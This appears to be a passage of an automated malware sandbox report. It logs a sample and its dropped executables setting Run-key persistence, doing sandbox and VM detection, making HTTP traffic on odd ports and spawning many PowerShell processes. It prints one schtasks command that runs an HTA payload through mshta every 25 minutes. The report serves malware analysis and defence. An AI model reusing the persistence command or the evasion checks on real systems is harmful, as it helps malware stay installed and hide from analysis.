Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn qyqYHmavVr6 /tr "mshta C:\Users\user\AppData\Local\Temp\hEVLkVr9t.hta" /sc minute /mo 25 /ru "user" /f

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0f39a8c7db.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0f39a8c7db.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8166ff9922.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8166ff9922.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1f1ada1ce1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1f1ada1ce1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8f4d1353d2.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8f4d1353d2.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a103019032.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a103019032.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0c43e4c1fb.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0c43e4c1fb.exe

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 33791
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 33791 -> 49818

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Code function: 8_2_6C4A55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_6C4A55F0

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062152001\a103019032.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062153001\0c43e4c1fb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	System information queried: FirmwareTableInformation

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
